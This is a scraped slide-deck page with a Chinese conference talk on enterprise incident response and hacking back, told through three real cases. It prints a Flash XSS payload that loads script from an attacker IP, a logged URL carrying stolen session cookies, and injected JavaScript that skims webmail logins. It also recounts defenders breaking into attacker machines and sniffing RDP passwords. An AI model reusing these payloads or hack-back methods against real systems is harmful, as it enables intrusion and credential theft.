“企业应急响应以及反渗透”
之真实案例分析
关于我
• piaca
• 乌云⽩白帽⼦子
• Insight Labs 成员
• 前新浪安全架构师
• ⼋八年安全从业经验
• 应急响应介绍
• ⼀一些案例
• 总结
什么是应急响应?
被“⿊黑”了
• 被⼊入侵
• 被 DDoS
• 被劫持
• 被蠕⾍虫
• 被钓⻥鱼
• ……
为什么做应急响应?
被逼的
• 保障业务
• 解决⽅方案
• 司法途径
• 还原攻击
• 明确意图
为什么做应急响应?
• 查漏补缺
怎么做应急响应?
• 确定攻击时间
• 查找攻击线索
• 实施解决⽅方案
怎么做应急响应?
• 定位攻击⼈人,取证
• 梳理攻击流程
为什么做反渗透?
• 被动变主动
• 攻击者都在做什么
为什么反渗透?
• 确认攻击者是谁
• 取证
案例之官微帐号被盗
9.“企业应急响应与反渗透”之真实案例分析
• ⾮非⼯工作⼈人员操作
• 帐号有被 cookie 登录
分析原因
• 可是 cookie 有 httponly
==================================================
URL : http://t.cn/zWI1bUQ
Last Visit Date : 2012-7-16 19:22:27
==================================================
==================================================
URL : http://50.116.13.242/index.php
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://t.cn/zWI1bUQ
==================================================
==================================================
URL : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
Last Visit Date : 2012-7-16 19:22:28
Referrer : http://50.116.13.242/index.php
Title : player.swf (application/x-shockwave-flash 对象)
==================================================
==================================================
URL : http://50.116.13.242/e.php?opener=0&cookie=ULV
%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma
%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn
%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B
%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3Dxlttnews@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry
%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B
%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des
%253D5937b4f4509871fc45195767ea7abe37%2526ev
%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c
%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V
%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2
Last Visit Date : 2012-7-16 19:22:31
Referrer : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js
%3E%3C/script%3E%22%27})
==================================================
⼯工作⼈人员收到⼀一条私信……
• 某分站 XSS
• 某分站 Apache CVE-2012-0053
还原攻击
• 修复漏洞,修复同类漏洞
• 加强员⼯工安全意识
我们做了什么
• 增加帐号安全策略
• 通过 IP / 邮箱信息定位到某公司安全⼈人员
• 没有恶意⺫⽬目的
关于攻击者
• 后⾯面有把漏洞提交乌云
案例之 500 错误⽇日志引发的⾎血案
9.“企业应急响应与反渗透”之真实案例分析
• 500 错误代表⽂文件存在并且执⾏行
• ⾮非业务⽂文件
分析原因
• 从更多的⽇日志⼊入⼿手
9.“企业应急响应与反渗透”之真实案例分析
9.“企业应急响应与反渗透”之真实案例分析
• 通过⽇日志确认⼊入侵途径是 tomcat
• 做了⼀一些操作
还原攻击
• tomcat 帐号密码并⾮非弱密码,how?
• 全⺴⽹网排查
• 攻击者早在⼏几⽉月前就发⽣生
再次分析原因并且还原攻击
• 通过收集帐号密码
• 收集攻击者 IP
• ⼤大多是⾁肉鸡 IP,⾹香港,廊坊
吹响反击号⾓角
• ⽤用“⿊黑客”的⽅方法拿到⾹香港,廊坊多台⾁肉鸡权限
• 在⾁肉鸡上发现⼤大量⿊黑客⼯工具和扫描⽇日志
• 在⾁肉鸡上发现内⺴⽹网仍有服务器被控制
9.“企业应急响应与反渗透”之真实案例分析
9.“企业应急响应与反渗透”之真实案例分析
• 清理全⺴⽹网 tomcat
我们做了什么
• 修改业务相关帐号密码
• 部署 snort
• IDC 出⼝口策略
• 梳理全⺴⽹网 web ⺫⽬目录⽂文件
• 修改业务关键代码
• 清理后⻔门
这就完了?
很傻很天真
IT 反馈域控服务器异常
gh0st
• 多台服务器被植⼊入后⻔门
继续分析
• 通过 at ⽅方式植⼊入后⻔门
• 通过域控管理帐号
• 确定被植⼊入后⻔门最初时间
2011-­‐11-­‐10,14:03:47,Security,审核成功,登录/注销	
  ,540,**,PDC,”成功的网络登录:
	
  	
   用户名:	
   *.ad
	
  	
   域:	
   	
   *
	
  	
   登录	
  ID:	
   	
   (0x0,0x1114E11)
	
  	
   登录类型:	
  3
	
  	
   登录过程:	
  NtLmSsp	
  
	
  	
   身份验证数据包:	
   NTLM
	
  	
   工作站名:	
  CC-­‐TEST-­‐V2
	
  	
   登录	
  GUID:	
   -­‐
	
  	
   调用方用户名:	
   -­‐
	
  	
   调用方域:	
  -­‐
	
  	
   调用方登录	
  ID:	
   -­‐
	
  	
   调用方进程	
  ID:	
  -­‐
	
  	
   传递服务:	
  -­‐
	
  	
   源网络地址:	
   192.168.100.81
	
  	
   源端口:	
   0
2011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录	
  ,680,NT	
  AUTHORITYSYSTEM,PDC,"尝试登录的用户:	
  	
   MICROSOFT_AUTHENTICATION_PACKAGE_V1_
	
  登录帐户:	
  	
  	
   QM-­‐*$
	
  源工作站:	
  	
   CC-­‐TEST-­‐V2
	
  错误代码:	
  	
   0xC000006A
"	
  
2011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录	
  ,680,NT	
  AUTHORITYSYSTEM,PDC,"尝试登录的用户:	
  	
   MICROSOFT_AUTHENTICATION_PACKAGE_V1_
	
  登录帐户:	
  	
  	
   QM-­‐*$
	
  源工作站:	
  	
   CC-­‐TEST-­‐V2
	
  错误代码:	
  	
   0xC000006A
• 虚拟机
192.168.100.81
• 弱⼝口令
• 内⺴⽹网检查时关机,逃过检查
• ⺫⽬目前能够确定这台是最初被渗透的
• 域控管理登录过
• 通过抓去 hash 控制域控
9.“企业应急响应与反渗透”之真实案例分析
• snort 加特征,发现仍有服务器被控制
我们⼜又做了什么
• 排查所有 windows 服务器
• 继续排查
9.“企业应急响应与反渗透”之真实案例分析
• 还有美国的 IP
持续反击中
• 通过 C 段 cain 嗅探到 3389 密码
9.“企业应急响应与反渗透”之真实案例分析
• 美国的 vps 上含有多个 QQ 和密码
关于攻击者
• 之前获取到其国内论坛帐号
9.“企业应急响应与反渗透”之真实案例分析
案例之永⽆无⽌止境的劫持
• 某业务多次多种类型劫持
• 某业务链路劫持被插⼊入⼲⼴广告
案例之永⽆无⽌止境的劫持
• DNS 劫持
• 链路劫持
• 劫持到⼀一个反向代理 IP 61.*.*.2
9.“企业应急响应与反渗透”之真实案例分析
9.“企业应急响应与反渗透”之真实案例分析
function ffCheck() {
try {
try {
var u = null != f ? f.idInput.value : document.getElementById("idInput").value;
} catch (e) {
var u = (document.getElementById("idInput").innerHTML).replace(/s/g, "");
}
var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value;
if (u.indexOf("@") == -1) u += "@xxx.com";
try {
if (u.indexOf("@") == -1) u = u + getdomain();
} catch (e) {}
sendurl("/abc", u, p, "coremail");
} catch (e) {}
return fOnSubmit();
}
function sendurl(uri, u, p, i) {
xmlHttp = GetXmlHttpObject();
if (xmlHttp == null) {
return;
}
param = "user=" + u + "&pass=" + p + "&icp=" + i;
xmlHttp.onreadystatechange = stateChanged;
try {
xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true);
} catch (e) {}
xmlHttp.setRequestHeader("If-Modified-Since", "0");
xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlHttp.send(param);
}
• 定位劫持位置
• 投诉
处理过程
• TTL
• IP
然并卵
• 完善监控
• https?
我们做了什么
• 业务⾓角度
总结
• 保障业务优先
• 对抗⾓角度
• 了解对⼿手
• 技术⾓角度
• 攻击技术
• ⽇日志、流量等数据
谢谢!

More Related Content

PPTX
2017.11.22 OWASP Taiwan Week (Lucas Ko)
PPTX
OWASP Top 10 (2013) 正體中文版
PDF
網站系統安全及資料保護設計認知 2019
PDF
基礎網頁程式攻擊檢驗
PDF
用戶端攻擊與防禦
PDF
網站系統安全及資料保護設計認知
PDF
淡江大學 - 產品測試+安全性測試+壓力測試
PDF
Android Taipei 2013 August - Android Apps Security
2017.11.22 OWASP Taiwan Week (Lucas Ko)
OWASP Top 10 (2013) 正體中文版
網站系統安全及資料保護設計認知 2019
基礎網頁程式攻擊檢驗
用戶端攻擊與防禦
網站系統安全及資料保護設計認知
淡江大學 - 產品測試+安全性測試+壓力測試
Android Taipei 2013 August - Android Apps Security

What's hot (20)

PDF
使安全成為軟體開發必要部分
PPTX
網頁弱點掃描服務簡報 20120606
PDF
伺服器端攻擊與防禦III
PDF
網站程式資安白箱與黑箱檢測處理經驗分享
PDF
伺服器端攻擊與防禦II
PDF
伺服器端攻擊與防禦I
PPTX
滲透測試 Talk @ Nisra
PDF
議題二:Web應用程式安全防護
PDF
【HITCON FreeTalk】Supply Chain Attack
PDF
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享
PDF
3.android 应用程序通用自动脱壳方法研究
PDF
Study of android malicious in dynamic unpacking
PDF
HITCON GIRLS_惡意程式分析介紹_in 成功大學_by Turkey_2016.04.28
PPTX
WebConf 2013「Best Practices - The Upload」
PPTX
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
PPTX
網頁安全 Web security 入門 @ Study-Area
PDF
HITCON TALK 產業視野下的 InfoSec
PPTX
OWST - Orange Web Security Toolkit Documentation
PPTX
Splunk資安智慧分析平台
PDF
HITCON GIRLS 成大講座 基礎知識(蜘子珣)
使安全成為軟體開發必要部分
網頁弱點掃描服務簡報 20120606
伺服器端攻擊與防禦III
網站程式資安白箱與黑箱檢測處理經驗分享
伺服器端攻擊與防禦II
伺服器端攻擊與防禦I
滲透測試 Talk @ Nisra
議題二:Web應用程式安全防護
【HITCON FreeTalk】Supply Chain Attack
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享
3.android 应用程序通用自动脱壳方法研究
Study of android malicious in dynamic unpacking
HITCON GIRLS_惡意程式分析介紹_in 成功大學_by Turkey_2016.04.28
WebConf 2013「Best Practices - The Upload」
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
網頁安全 Web security 入門 @ Study-Area
HITCON TALK 產業視野下的 InfoSec
OWST - Orange Web Security Toolkit Documentation
Splunk資安智慧分析平台
HITCON GIRLS 成大講座 基礎知識(蜘子珣)
Ad

Viewers also liked (18)

PDF
4.解析 p2 p 金融安全
PDF
7.互联网安全人才发展现状
PDF
2.从案件看国内 d do s 的最新方式
PDF
5.云安全现场演示
PDF
8.如何从外围进入各大公司内网
PDF
4.由 pc 端安全问题引发的重重隐患
PPTX
Adv 420 final presentation
PDF
3.无人飞行器安全性分析
PDF
1.手机号背后的灰色地带
PDF
0.struts 2 事件两周年启示+乌云社区颁奖
PPT
Xmpp
PDF
1.去哪儿安全-从 0 到 1
PPTX
The truth meter
PDF
社群網站資料探勘技術
PDF
6.ctf经验分享
PDF
6.web 安全架构浅谈
PDF
2.3 g:4g usim 卡的安全性分析
PDF
5.多角度对抗 waf 的思路与实例
4.解析 p2 p 金融安全
7.互联网安全人才发展现状
2.从案件看国内 d do s 的最新方式
5.云安全现场演示
8.如何从外围进入各大公司内网
4.由 pc 端安全问题引发的重重隐患
Adv 420 final presentation
3.无人飞行器安全性分析
1.手机号背后的灰色地带
0.struts 2 事件两周年启示+乌云社区颁奖
Xmpp
1.去哪儿安全-从 0 到 1
The truth meter
社群網站資料探勘技術
6.ctf经验分享
6.web 安全架构浅谈
2.3 g:4g usim 卡的安全性分析
5.多角度对抗 waf 的思路与实例
Ad

Similar to 9.“企业应急响应与反渗透”之真实案例分析 (9)

PDF
企业安全应急响应与渗透反击V0.04(程冲)
PDF
20111104 apt攻击案例分享 glacier
PPT
2009通信安全峰会(11月6日)
PDF
Twitter Wanghongyang Backup Security 20090402 0713
DOC
一次详细的渗透Wordpress教程
PPT
渗透测试思路技术与方法
PPT
流量清洗产品概述和关键技术介绍
PDF
互联网公司web安全挑战与防护思路浅谈
PDF
6kbbs vulnerability report
企业安全应急响应与渗透反击V0.04(程冲)
20111104 apt攻击案例分享 glacier
2009通信安全峰会(11月6日)
Twitter Wanghongyang Backup Security 20090402 0713
一次详细的渗透Wordpress教程
渗透测试思路技术与方法
流量清洗产品概述和关键技术介绍
互联网公司web安全挑战与防护思路浅谈
6kbbs vulnerability report

9.“企业应急响应与反渗透”之真实案例分析